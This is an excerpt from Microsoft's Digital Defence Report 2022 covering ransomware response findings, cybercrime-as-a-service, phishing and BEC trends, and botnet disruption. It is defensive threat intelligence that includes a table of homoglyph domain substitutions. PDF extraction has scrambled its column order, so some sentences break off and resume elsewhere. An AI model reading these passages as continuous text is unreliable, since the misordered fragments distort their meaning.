Ransomware insights from front-line responders Continued Active Directory (AD) and Azure AD security 88% of impacted customers did not employ AD and Azure AD security best practices. This has become a common attack vector as attackers exploit misconfigurations and weaker security postures in critical identity systems to gain broader access and impact to businesses. Least privilege access and use of Privileged Access Workstations (PAW) None of the impacted organisations implemented proper administrative credential segregation and least privilege access principles via dedicated workstations during the management of their critical identity and high- value assets, such as proprietary systems and business-critical applications. Privilege account security 88% of engagements, MFA was not implemented for sensitive and high privileged accounts, leaving a security gap for attackers to compromise credentials and pivot further attacks using legitimate credentials. 84% Administrators across 84% of organisations did not use privilege identity controls such as just- in-time access to prevent further nefarious use of compromised privileged credentials. 1 Weak identity controls Human-operated ransomware continues to evolve and employ credential theft and lateral movement methods traditionally associated with targeted attacks. Successful attacks are often the result of long-running campaigns involving compromise of identity systems, like Active Directory (AD), that allow human operators to steal credentials, access systems and remain persistent in the network. 1 Weak identity controls: Credential theft attacks remain one of the top contributing factors 2 Ineffective security operations processes do not just present a window of opportunity for attackers, but significantly impact the time to recover 3 Eventually it boils down to data – organisations struggle to implement an effective data protection strategy which aligns with their business needs The three main contributing factors seen in our on-site response engagements: 15 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
Patching: 68% of impacted organisations did not have an effective vulnerability and patch management process, and a high dependence on manual processes versus automated patching led to critical openings. Manufacturing and critical infrastructure continue to struggle with maintenance and patching of legacy operational technology (OT) systems. Lack of security operations tooling: Most organisations reported a lack of end- to-end security visibility due to a lack or misconfiguration of security tools, leading to a decrease in detect and response effectiveness. 60% of organisations reported no use of an EDR6 tool, a fundamental technology for detection and response. 60% did not invest in security information and event management (SIEM) technology leading to monitoring silos, limited ability to detect end-to-end threats and inefficient security operations. Automation remains a key gap in SOC tooling and processes, forcing SOC staff to spend countless hours making sense of security telemetry. 84% of impacted organisations did not enable integration of their multi-cloud environments into their security operations tooling. Response and recovery processes: 76% Lack of an effective response plan was a critical area observed in 76% of impacted organisations, preventing proper organisational crisis readiness and negatively impacting time to respond and recover. Ransomware insights from front-line responders Continued 2 Ineffective security operations Our data shows organisations which suffered ransomware attacks have significant gaps in their security operations, tooling and information technology asset lifecycle management. Based on the available data, the following gaps were most observed: 3 Limited data protection Many compromised organisations lacked proper data protection processes leading to a severe impact on recovery times and the capability to return to business operations. The most common gaps encountered include: Immutable backup: 44% of organisations did not have immutable backups for the impacted systems. Data also shows administrators did not have backups and recovery plans for critical assets such as AD. Data loss prevention: Attackers usually find their way to compromise systems via exploiting vulnerabilities in the organisation, exfiltrating critical data for extortion, intellectual property theft or monetisation. 92% of impacted organisations did not implement effective data loss prevention controls to mitigate these risks, leading to critical data loss. 16 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
Ransomware declined in some regions and increased in others This year we observed a drop in the overall number of ransomware cases reported to our response teams in North America and Europe compared to the previous year. At the same time, cases reported in Latin America increased. One interpretation of this observation is cybercriminals pivoted away from areas perceived to have a higher risk of triggering law enforcement scrutiny in favour of softer targets. Since Microsoft did not observe a substantial improvement in enterprise network security worldwide to explain the decrease in ransomware-related support calls, we believe the most likely cause is a combination of law enforcement activity in 2021 and 2022 which increased the cost of criminal activity, along with some geopolitical events of 2022. One of the most prevalent RaaS operations belongs to a Russian-speaking criminal group known as REvil (also known as Sodinokibi) that has been active since 2019. In October 2021, REvil’s servers were taken offline as part of the international law enforcement Operation GoldDust.7 In January 2022, Russia arrested 14 alleged REvil members and raided 25 locations associated with them.8 This was the first time Russia acted against ransomware operators on its soil. Actionable insights 1 Focus on holistic security strategies, as all of the ransomware families take advantage of the same security weaknesses to impact a network. 2 Update and maintain security basics to increase defence-in-depth base level of protection and modernise security operations. Moving to the cloud allows you to detect threats more quickly and respond faster. Links to further information Protect your organisation from ransomware | Microsoft Security Seven ways to harden your environment against compromise | Microsoft Security Blog Improving AI-based defences to disrupt human-operated ransomware | Microsoft 365 Defender Research Team Security Insider: Explore the latest cybersecurity insights and updates | Microsoft Security While law enforcement activities likely slowed the frequency of attacks in 2022, threat actors might well develop new strategies to avoid being caught in the future. Moreover, tension between Russia and the United States over Russia’s invasion of Ukraine appears to have put an end to Russia’s nascent cooperation in the global fight against ransomware. After a brief period of uncertainty following the REvil arrests, the United States and Russia ceased cooperation in pursuing ransomware actors, which means cybercriminals might view Russia as a safe haven once more. Looking ahead, we predict the pace of ransomware activities will depend on the outcome of some key questions: 1. Will governments take action to prevent ransomware criminals from operating within their borders, or seek to disrupt actors operating from foreign soil? 2. Will ransomware groups change tactics to remove the need for ransomware and resort to extortion style attacks? 3. Will organisations be able to modernise and transform their IT operations faster than criminals can exploit vulnerabilities? 4. Will advancements in tracking and tracing ransom payments force ransom recipients to change tactics and negotiations? 2× Ransomware attacks decreased in some regions, but ransom demands more than doubled. While law enforcement activities likely slowed the frequency of attacks in 2022, threat actors might well develop new strategies to avoid being caught in the future. 17 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
the RDP, SSH and cPanels with appropriate tools and scripts to facilitate various types of cyberattacks. Homoglyph domain creation services are increasingly requiring payment in cryptocurrencies. Homoglyph domains impersonate legitimate domain names by utilising characters that are identical or nearly identical in appearance to another character. The aim is to deceive the viewer into thinking the homoglyph domain is the genuine domain. These domains are a ubiquitous threat and a gateway for a significant amount of cybercrime. CaaS sites now sell custom homoglyph domain names, which allows buyers to request specific company and domain names to impersonate. After payment is received, the CaaS merchants use a homoglyph generator tool to select the domain name and then register the malicious homoglyph. Payment for this service is almost exclusively in cryptocurrency. process invoicing, such as CFOs or ��Accounts Receivable’. Similarly, industries participating in public contracting are often targeted due to the quantity of information that is made available through the public bidding process. DCU investigations into CaaS surfaced a number of key trends: The number and sophistication of services is increasing. One example is the evolution of web shells which typically consist of compromised web servers used to automate phishing attacks. DCU observed CaaS resellers simplifying the upload of phishing kits or malware through specialised web-dashboards. CaaS sellers often subsequently attempt to sell additional services to the threat actor through the dashboard such as spam message services and specialised spam recipient lists based on defined attributes including geographic location or profession. In some instances, we observed a single web shell being used in multiple attack campaigns, which suggests threat actors might maintain persistent access to the compromised server. We also observed an increase in anonymisation services available as part of the CaaS ecosystem as well as offers for virtual private networks (VPN) and virtual private server (VPS) accounts. In most instances, the VPN/VPS offered were initially procured through stolen credit cards. CaaS websites also offered a larger number of remote desktop protocol (RDP), secure shell (SSH) and cPanels for use as a platform to orchestrate cybercrime attacks. CaaS merchants configure Cybercriminals are now collaborating across time zones and languages to deliver specific results. For example, one CaaS website administered by an individual in Asia maintains operations in Europe, and creates malicious accounts in Africa. The multi-jurisdictional nature of these operations present complex law and enforcement challenges. In response, DCU focuses its efforts on disabling malicious criminal infrastructure used to facilitate CaaS attacks and collaborating with law enforcement agencies around the world to hold criminals accountable. Cybercriminals are increasingly using analytics to maximise reach, scope and gain. Like legitimate businesses, CaaS websites must ensure the validity of products and services to maintain a solid reputation. For example, CaaS websites routinely automate access to compromised accounts to ensure the validity of compromised credentials. Cybercriminals will discontinue sales of specific accounts when passwords are reset or vulnerabilities patched. Increasingly, we identified CaaS websites providing buyers with on-demand verification as a quality control process. As a result, buyers can feel confident the CaaS website sells active accounts and passwords while reducing potential costs to the CaaS merchant if the stolen credentials are remediated prior to sale. DCU also observed CaaS websites offering buyers the option to purchase compromised accounts from specific geographic locations, designated online service providers and specifically targeted individuals, professions and industries. Frequently ordered accounts focus on professionals or departments that Cybercrime- as-a-Service Cybercrime-as-a-Service (CaaS) is a growing and evolving threat to customers worldwide. The Microsoft Digital Crimes Unit (DCU) observed continued growth of the CaaS ecosystem with an increasing number of online services facilitating various cybercrimes, including BEC and human-operated ransomware. Phishing continues to be a preferred attack method as cybercriminals can acquire significant value from successfully stealing and selling access to stolen accounts. In response to the expanding CaaS market, DCU enhanced its listening systems to detect and identify CaaS offerings across the entire ecosystem of internet, deep web, vetted forums,9 dedicated websites, online discussion forums and messaging platforms. 2,750,000 site registrations successfully blocked by DCU this year to get ahead of criminal actors that planned to use them to engage in global cybercrime. 18 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
Attackers aim to encrypt as much data as possible 1 2 3 Select a phishing site template/design from among the hundreds offered. Once these steps are completed, the PhaaS merchant creates services with three or four layers of redirect and hosting resources to target specific users. The campaign is subsequently launched, and victim credentials are harvested, verified and sent to the email address provided by the purchaser. For a premium, many PhaaS merchants offer to host phishing sites on the public blockchain so they can be accessed by any browser and redirects can point users to a resource on the distributed ledger. Provide an email address to receive credentials obtained from phishing victims. Pay the PhaaS merchant in cryptocurrency. DCU’s work to develop tools and techniques which identify and disrupt CaaS cybercriminals is ongoing. The evolution of CaaS services presents significant challenges, particularly in disrupting cryptocurrency payments. 24/7 support. The DDoS subscription service offers different architectures and attack methods, so a purchaser simply selects a resource to attack and the seller provides access to an array of compromised devices on their botnet to conduct the attack. The cost for the DDoS subscription is a mere USD 500. it is a virtual machine, gathering details about the browser and hardware being used, and more. If all checks pass, traffic is sent to a landing page used for phishing. End-to-end cybercrime services are selling subscriptions to managed services. Typically, each step in the commission of an online crime can expose threat actors if operational security is poor. The risk of exposure and identification increases if services are purchased from multiple CaaS sites. DCU observed a concerning trend in the dark web whereby there is an increase in services offering to anonymise software code and genericise website text to reduce exposure. End- to-end cybercrime subscription service providers manage all services and guarantee results which further reduce exposure risks to the subscribing OCN. The reduced risk has increased the popularity of these end-to-end services. Phishing-as-a-Service (PhaaS) is one example of an end-to-end cybercrime service. PhaaS is an evolution of prior services known as fully undetectable services (FUD) and is offered on a subscription basis. Typical PhaaS terms include keeping phishing websites active for a month. DCU also identified a CaaS merchant offering distributed denial of service (DDoS) on a subscription model. This model outsources the creation and maintenance of the botnet necessary to carry out attacks to the CaaS merchant. Each DDoS subscription customer receives an encrypted service to enhance operational security and one year of CaaS sellers increasingly offer compromised credentials for purchase. Compromised credentials enable unauthorised access to user accounts including email messaging service, corporate file sharing resources and OneDrive for Business. If administrator credentials are compromised, unauthorised users could gain access to confidential files, Azure resources and company user accounts. In many instances, DCU investigations identified unauthorised use of the same credential across multiple servers as a means to automate verifying credentials. This pattern suggests the compromised user might be a victim of multiple phishing attacks or have device malware allowing botnet keyloggers to collect credentials. CaaS services and products with enhanced features are emerging to avoid detection. One CaaS seller offers phishing kits with increased layers of complexity and anonymisation features designed to circumvent detection and prevention systems for as little as USD 6 per day. The service offers a series of redirects that perform checks before allowing traffic to the next layer or site. One of these runs over 90 checks for fingerprinting the device, including whether Cybercrime- as-a-Service Continued PhaaS, cybercriminals offer multiple services within a single subscription. In general, a purchaser needs to take only three actions: 19 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
and force cybercriminals to use other obfuscation methods like coin tumbling or unlicensed exchanges. As an example, Uniswap recently announced it will start to use blacklists to block wallets known to be involved in illicit activities from transacting on the exchange.15 cash-out options, such as centralised exchanges (CEX), peer-to-peer (P2P) and over the counter (OTC) exchanges. DEXes are an attractive laundering location because they often do not follow AML measures. In December 2021, hackers attacked the global cryptocurrency trading platform AscendEx and stole approximately USD 77.7 million in cryptocurrency belonging to its customers.12 AscendEx hired blockchain analytics firms and contacted other CEXs so the wallets receiving stolen funds could be blacklisted. Additionally, addresses where the coins were sent were labelled as such on the Ethereum blockchain explorer Etherscan.13 In order to circumvent the alerting and blacklisting, the hackers sent USD 1.5 million in Ethereum to Uniswap, one of the world’s largest DEXs, on February 18, 2022.14 The adoption of stronger AML measures by DEXs could blunt laundering activity on their platforms Tracking ransomware payments Ransomware is one of the largest sources of illicitly gained cryptocurrency. In an effort to disrupt malicious technical infrastructure used in ransomware attacks – for example, the disruption of Zloader in April 202211 – Microsoft’s DCU tracks criminal wallets to enable cryptocurrency tracking and recovery capabilities. DCU investigators have observed ransomware actors evolving their communication tactics with victims to conceal the money trail. Originally, cybercriminals included Bitcoin addresses in their ransom notes. However, this made it easy to follow payment transactions on the blockchain, so ransomware actors stopped including wallet addresses and instead appended email addresses or links to chat websites to communicate ransom payment addresses to victims. Some actors even created unique webpages and logins for each victim to prevent security researchers and law enforcement from obtaining the criminals’ wallet addresses by pretending to be victims. Despite criminals’ efforts to hide their tracks, some ransom payments can still be recovered by working with law enforcement and crypto analysis companies that can track movement on the blockchain. Trending: DEX laundering of illicit proceeds A key issue for cybercriminals is the conversion of cryptocurrency to fiat currency. Cybercriminals have several potential avenues for conversion, each of which carries a different degree of risk. One method used to reduce risk is to launder proceeds through a decentralised exchange (DEX) before cashing out via available Criminal use of cryptocurrencies As the adoption of cryptocurrency becomes mainstream, criminals are increasingly using it to evade law enforcement and anti-money laundering (AML) measures. This heightens the challenge for law enforcement to track and trace cryptocurrency payments to cybercriminals. Worldwide spending on blockchain solutions grew by approximately 340% over the last four years, while new cryptocurrency wallets grew by around 270%. There are more than 83 million unique wallets globally, and the total market capitalisation of all cryptocurrencies was approximately USD 1.1 trillion as of July 28, 2022.10 Source: Twitter.com – @PeckShieldAlert (PeckShield is a China-based blockchain security company). Using the cryptocurrency investigative tool Chainalysis, Microsoft’s Digital Crimes Unit discovered the AcendEX hackers swapped their stolen funds at a smaller DEX called Curve in addition to Uniswap. This diagram illustrates the laundering routes the team uncovered. Each circle represents a cluster of wallets and the numbers on each line represent the total amount of Ethereum transmitted for laundering purposes. Actionable insights 1 If you are a victim of cybercrime who has paid the criminal using cryptocurrency, contact local law enforcement who might be able to help track and recover lost funds. 2 Become familiar with the ALM measures in place when selecting a DEX. Links to further information Hardware-based threat defence against increasingly complex cryptojackers | Microsoft 365 Defender Research Team Uniswap V3 Curve AscendEX.com AscendEX.com stolen funds 11-12-2021 72.19 ETH ETH 46.77 Tracking illicitly gained cryptocurrency 20 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
Microsoft detects millions of BEC emails every month, equivalent to 0.6% of all phishing emails observed. A report from IC318 published in May 2022 indicates an upward trend in exposed losses due to BEC attacks. The techniques used in phishing attacks continue to increase in complexity. In response to countermeasures, attackers adapt new ways to implement their techniques and increase the complexity of how and where they host campaign operation infrastructure. This means organisations must regularly reassess their strategy for implementing security solutions to block malicious emails and strengthen access control for individual user accounts. The evolving phishing threat landscape Credential phishing schemes are on the rise and remain a substantial threat to users everywhere because they indiscriminately target all inboxes. Among the threats our researchers track and protect against, the volume of phishing attacks is orders of magnitude greater than all other threats. Using data from Defender for Office, we see malicious email and compromised identity activity. Azure Active Directory Identity Protection provides still more information through compromised identity event alerts. Using Defender for Cloud Apps, we see compromised identity data access events, and Microsoft 365 Defender (M365D) provides cross-product correlation. The lateral movement metric comes from Defender for Endpoint (attack behaviour alerts and events), Defender for Office (malicious email) and again M365D for cross- product correlation). 531,000 In addition to the URLs blocked by Defender for Office, our Digital Crimes Unit directed the takedown of 531,000 unique phishing URLs hosted outside of Microsoft. 1 hr 12 m The median time it takes for an attacker to access your private data if you fall victim to a phishing email.16 1 hr 42 m The median time for an attacker to begin moving laterally within your corporate network once a device is compromised.17 Detected phish emails Millions 900 800 700 600 500 400 300 200 100 0 Jul 2021 Aug 2021 Sep 2021 Oct 2021 Nov 2021 Dec 2021 Jan 2022 Feb 2022 Mar 2022 Apr 2022 May 2022 Jun 2022 The number of phish detections per week continue to rise. The decrease in December-January is an expected seasonal drop, also reported in last year’s report. Source: Exchange Online Protection signals. 710 million phishing emails blocked per week. Microsoft 365 credentials remain one of the most highly sought-after account types for attackers. Once login credentials are compromised, attackers can log in to corporate-tied computer systems to facilitate infection with malware and ransomware, steal confidential company data and information by accessing SharePoint files, and continue the spread of phish by sending additional malicious emails using Outlook, among other actions. In addition to campaigns with broader targets, phishing for credentials, donations and personal information, attackers are targeting selective businesses for larger payouts. Email phishing attacks against businesses for financial gain are collectively referred to as BEC attacks. 21 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
More than ever, phishers are relying on legitimate infrastructure to operate, driving a rise in phishing campaigns aimed at compromising various aspects of an operation so they do not have to purchase, host or operate their own. For example, malicious emails might originate from compromised sender accounts. Attackers benefit from using these email addresses which have a higher reputation score and are seen as more trustworthy than newly created accounts and domains. In some more advanced phishing campaigns, we observed attackers preferring to send and spoof from domains which have DMARC19 incorrectly set up with a ‘no action’ policy, opening the door for email spoofing. We continue to observe a steady year-over-year increase in phishing emails. The shift to remote work in 2020 and 2021 saw a substantial increase in phishing attacks aiming to capitalise on the changing work environment. Phish operators are quick to adopt new email templates using lures aligned with major world events such as the COVID-19 pandemic and themes linked to collaboration and productivity tools such as Google Drive or OneDrive file sharing. While COVID-19 themes have diminished, the war in Ukraine became a new lure starting in early March 2022. Our researchers observed a staggering increase of emails impersonating legitimate organisations soliciting cryptocurrency donations in Bitcoin and Ethereum, allegedly to support Ukrainian citizens. Only a few days after the start of the war in Ukraine in late February 2022, the number of detected phishing emails containing Ethereum addresses encountered across enterprise customers increased dramatically. Total encounters peaked in the first week of March when half a million phishing emails contained an Ethereum wallet address. Prior to the start of the war, the number of Ethereum wallet addresses across other emails detected as phish was significantly less, averaging a few thousand emails per day. Large phish operations tend to use cloud services and cloud virtual machines (VMs) to operationalise large scale attacks. Attackers can fully automate the process of deploying and delivering emails from VMs using SMTP email relays or cloud email infrastructure to benefit from the high deliverability rates and positive reputation of these legitimate services. If malicious email is allowed to be sent through these cloud services, defenders must rely on strong email filtering capabilities to block emails from entering their environment. Microsoft accounts remain a top target for phishing operators, as evidenced by the numerous phishing landing pages which impersonate the Microsoft 365 login page. For example, phishers attempt to match the Microsoft login experience in their phish kits by generating a unique URL customised to the recipient. This URL points to a malicious webpage developed to harvest credentials, but a parameter in the URL will contain the specific recipient’s email address. Once the target navigates to the page, the phish kit will pre- populate user login data and a corporate logo customised to the email recipient, mirroring the appearance of the targeted company’s custom Microsoft 365 login page. Phishing page impersonating a Microsoft login with dynamic content Phishing emails with Ethereum wallet addresses Thousands 0 100 200 300 400 500 600 Jul 2021 Aug 2021 Sep 2021 Oct 2021 Nov 2021 Dec 2021 Jan 2022 Feb 2022 Mar 2022 Apr 2022 May 2022 Jun 2022 Total emails detected as phish containing Ethereum wallet addresses increased at the start of the Ukraine-Russia conflict and tapered off after the initial push. The evolving phishing threat landscape Continued 22 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
Defending against phish To reduce your organisation’s exposure to phish, IT administrators are encouraged to implement the following policies and features: 1 Require the use of MFA across all accounts to limit unauthorised access. 2 Enable conditional access features for highly privileged accounts to block access from countries, regions and IPs that do not typically generate traffic at your organisation. 3 Consider using physical security keys for executives, employees involved in payment or purchase activities and other privileged accounts. 4 Enforce the use of browsers which support services such as Microsoft SmartScreen to analyse URLs for suspicious behaviours and blocks access to known malicious websites.23 5 Use a machine-learning based security solution that quarantines high probability phish and detonates URLs and attachments in a sandbox before email reaches the inbox, such as Microsoft Defender for Office 365.24 6 Enable impersonation and spoofing protection features across your organisation. 7 Configure DomainKeys Identified Mail (DKIM) and Domain-based Message Authentication Reporting Conformance (DMARC) action policies to prevent delivery of non-authenticated emails that might be spoofing reputable senders. 8 Audit tenant and user created allow rules and remove broad domain and IP based exceptions. These rules often take precedence and can allow known malicious emails through email filtering. 9 Regularly run phishing simulators to gauge the potential risk across your organisation and to identify and educate vulnerable users. Links to further information From cookie theft to BEC: Attackers use AiTM phishing sites as entry point to further financial fraud | Microsoft 365 Defender Research Team, Microsoft Threat Intelligence Centre (MSTIC) BEC trends As a point of entry, BEC attackers normally attempt to start a conversation with potential victims to establish rapport. Posing as a colleague or business acquaintance, the attacker gradually leads the conversation in the direction of a monetary transfer. The introduction email, which we track as a BEC lure, represents close to 80% of detected BEC emails. Other trends identified by Microsoft security researchers over the past year include: • The most frequently used techniques in BEC attacks observed in 2022 were spoofing21 and impersonation.22 • The BEC subtype causing the most financial damage to victims was invoice fraud (based on volume and requested dollar amounts seen in our BEC campaign investigations). • Business information theft such as accounts payable reports and customer contacts enable attackers to craft convincing invoice fraud. • Most payroll redirection requests were sent from free email services and seldom from compromised accounts. Email volume from these sources spiked around the first and fifteenth of each month, the most common pay dates. • Despite being well-known avenues for fraud, gift card scams comprised only 1.9% of the BEC attacks detected. Spotlight on business email compromise Cybercriminals are developing increasingly complex schemes and techniques to defeat security settings and target individuals, businesses and organisations. We are investing significant resources to further enhance our BEC enforcement programme in response. BEC is the costliest financial cybercrime, with an estimated USD 2.4 billion in adjusted losses in 2021, representing more than 59% of the top five internet crime losses globally.20 To understand the scope of the problem and how best to protect users against BEC, Microsoft security researchers have been tracking the most common themes used in attacks. BEC themes (January-June 2022) Invoice fraud 9.3% BEC lure 79.9% Payroll redirection 4.6% Business information 4.3% Gift card scam 1.9% BEC themes by percentage of occurrence Actionable insights 23 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
Homoglyph deception BEC and phishing are common social engineering tactics. Social engineering plays a significant role in crime, persuading a target to interact with the criminal by gaining trust. In physical commerce, trademarks are used to secure trust in the origin of a product or service, and counterfeit products are an abuse of the trademark. Similarly, cybercriminals pose as a contact familiar to the target during a phishing attack, using homoglyphs to deceive potential victims. A homoglyph is a domain name used for email communication in BEC, in which a character is replaced by one that is identical or nearly identical in appearance, in order to deceive the target. Homoglyph techniques used in BEC attempts BEC generally has two phases, the first of which involves compromise of credentials. These types of credential leaks can be a result of phishing attacks or large data breaches. The credentials are then sold or traded on the dark web. The second phase is the fraud phase, where attackers use compromised credentials to engage in sophisticated social engineering using homoglyph email domains. Actionable insights 1 Enforce the use of browsers that support services to analyse URLs for suspicious behaviours and blocks access to known malicious websites such as Safe Links and SmartScreen.25 2 Use a machine-learning based security solution that quarantines high probability phish and detonates URLs and attachments in a sandbox before email reaches the inbox. Links to further information Internet Crime Complaint Centre (IC3) | Business Email Compromise: The USD 43 Billion Scam Spoof intelligence insight – Office 365 | Microsoft Docs Impersonation insight – Office 365 | Microsoft Docs Technique % of domains showing homoglyph technique sub l for I 25% sub i for l 12% sub q for g 7% sub rn for m 6% sub .cam for .com 6% sub 0 for o 5% sub ll for l 3% sub ii for i 2% sub vv for w 2% sub l for ll 2% sub e for a 2% sub nn for m 1% sub ll for I, sub l for i 1% sub o for u 1% Analysis of over 1,700 homoglyph domains between January-July 2022. While 170 homoglyph techniques were used, 75% of domains used just 14 techniques. A homoglyph in action A homoglyph domain that looks identical to a mail domain the victim recognises is registered on a mail provider with a username that is identical. A hijacked email is then sent from the hijacked domain with new payment instructions. Leveraging open-source intelligence and access to email threads, the criminal identifies individuals who have responsibility for invoicing and payments. They then create an impersonation of an email address of the individual sending invoices. This impersonation is composed of an identical username and mail domain that is a homoglyph of the genuine sender. The attacker copies an email chain containing a legitimate invoice, then changes the invoice to contain their own bank details. This new, modified invoice is then resent from the homoglyph impersonation email to the target. Because the context makes sense and the email looks genuine, often the target follows the fraudulent instructions. Progression of a BEC attack 24 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
Waledac botnet Description: A complex spam botnet with US domains that collected email addresses and distributed spam that infected up to 90,000 computers across the world.26 Collaboration: Creation of another consortium, the Microsoft Malware Protection Centre (MMPC) with a focus on close collaboration with academics.27 Microsoft response: Microsoft used tiered disruption approach of C2 and surprised bad actors by seizing US-based domains without notice.28 Microsoft granted temporary ownership of nearly 280 domains used by Waledac’s servers. Trickbot botnet Description: A sophisticated botnet with fragmented infrastructure across the globe that targeted the financial services industry; compromised IoT devices. Collaboration: Microsoft partnered with the Financial Services Information Sharing and Analysis Centre (FS-ISAC) to bring down Trickbot.30 Microsoft response: DCU built a system to identify and track bot infrastructure and generated notifications for active internet providers, taking into account specific laws in various countries. 2008 2009 2011 2013 2019 2022 Description: A fast-spreading worm targeting the Windows OS, infecting millions of computers and devices in a common network; created network outages worldwide. Collaboration: Formation of the Conficker Working Group, the first consortium of its kind. Microsoft partnered with 16 organisations across the globe to defeat the bot. Microsoft response: The group collaborated across many international jurisdictions and was successful bringing Conficker down. Conficker botnet Collaboration: Designed to thwart cybercrime impacting the Microsoft ecosystem through close integration across a team of investigators, lawyers and engineers. Microsoft approach: The goal is to better understand the technical aspects of various malware and provide these insights to Microsoft’s legal team to develop an effective disruption strategy. Microsoft Digital Crimes Unit is formed DCU continues to innovate and is looking to use its experience in botnet disruptions to conduct coordinated operations that go beyond malware. Our continued success requires creative engineering, sharing of information, innovative legal theories and public and private partnerships. Looking ahead Description: Microsoft disrupted the infrastructure of seven threat actors over the past year, preventing them from distributing additional malware, controlling victims’ computers and targeting additional victims. Collaboration: In partnership with internet service providers, governments, law enforcement and private industry, Microsoft shared information to remediate over 17 million malware victims worldwide. Continued focus on disruption Description: An advertising botnet designed to direct people to dangerous websites that would install malware or steal personal information; infected more than two million computers and cost advertisers more than USD 2.7 million per month; primarily in US and Western Europe. Collaboration: Worked closely with the FBI and Europol’s Cybercrime Centre to bring down the peer-to- peer infrastructure. Microsoft response: Joined the Zero Access network, replaced the criminal C2 servers and successfully seized download server domains. Sirefef/Zero Access botnet Rustock botnet Description: A backdoor trojan spam email bot using internet providers as primary C2s; designed to sell pharmaceuticals. Collaboration: Microsoft forged a partnership with Pfizer Pharmaceuticals to understand the drugs sold by Rustock and worked closely with Dutch law enforcement officials.29 Microsoft response: Microsoft worked with US Marshals and law enforcement in the Netherlands to take down the C2 servers in that country. Registered and blocked all future domain generator algorithms (DGAs). A timeline of botnet disruption from Microsoft’s early days of collaboration For more than a decade, DCU has worked to proactively stop cybercrime resulting in 26 malware and nation state disruptions. As the DCU team uses more advanced tactics and tools to shut down these illicit operations, we see the cybercriminals also evolve their approaches in an attempt to stay a step head. Here is a timeline showing a sample of the botnets disrupted by DCU and the strategies Microsoft adopted to shut them down. 25 Microsoft Digital Defence Report 2022 Report Introduction Nation State Threats Cyber Resilience Contributing Teams The State of Cybercrime Cyber Influence Operations Devices and Infrastructure Contributing Teams Report Introduction The State of Cybercrime Nation State Threats Devices and Infrastructure Cyber Influence Operations Cyber Resilience
Devices acting as reverse proxies for malware C2 are not just unique to Trickbot and MikroTik routers. In collaboration with the Microsoft RiskIQ team, we traced back to the C2 involved and, through observing SSL certificates, identified Ubiquiti and LigoWave devices that are impacted as well.32 This is a strong indication that IoT devices are becoming active components of nation state coordinated attacks and a popular target for cybercriminals using widespread botnets. redirects traffic between two ports in the router, establishing the line of communication between Trickbot-affected devices and the C2. We have aggregated our knowledge of the various methods of attacking MikroTik devices, beyond just Trickbot, as well as known common vulnerabilities and exposures (CVEs) into an open-source tool for MikroTik devices, which can extract the forensic artifacts related to attacks on these devices.31 More specifically, we identified how Trickbot operators utilise compromised MikroTik routers and reconfigure them to act as part of their C2 infrastructure. The popularity of these devices compounds the severity of their abuse by Trickbot, and their unique hardware and software enable threat actors to evade traditional security measures, expand their infrastructure and compromise more devices and networks. Exposed routers are at risk of having potential vulnerabilities exploited. By tracking and analysing traffic containing secure shell (SSH) commands, we observed attackers using MikroTik routers to communicate with Trickbot infrastructure after obtaining legitimate credentials to devices. These credentials can be obtained through brute force attacks, exploiting known vulnerabilities with readily available patches and using default passwords. Once a device is accessed, the attacker issues a unique command that Cybercriminal abuse of infrastructure Internet gateways as criminal command and control infrastructure IoT devices are becoming an increasingly popular target for cybercriminals using widespread botnets. When routers are unpatched and left exposed directly to the internet, threat actors can abuse them to gain access to networks, execute malicious attacks and even support their operations. The Microsoft Defender for IoT team conducts research on equipment ranging from legacy industrial control system controllers to cutting- edge IoT sensors. The team investigates IoT- and OT-specific malware to contribute to the shared list of indicators of compromise. Routers are particularly vulnerable attack vectors because they are ubiquitous across internet- connected homes and organisations. We have been tracking the activity of MikroTik routers, a popular router around the world residentially and commercially, identifying how they are utilised for command and control (C2), domain name system (DNS) attacks and crypto mining hijacking. Attacker Command and control Sets up malicious domains Installs Trickbot on target network via a campaign Communicates with C2 via router; drops payloads, steals info Compromised IoT device Target network Performs recon to obtain network information Scans for MikroTik devices that are exposed to the internet Steals device credentials and maintains persistence Executes traffic redirection command Trickbot attack chain showing the use of MikroTik IoT devices as proxy 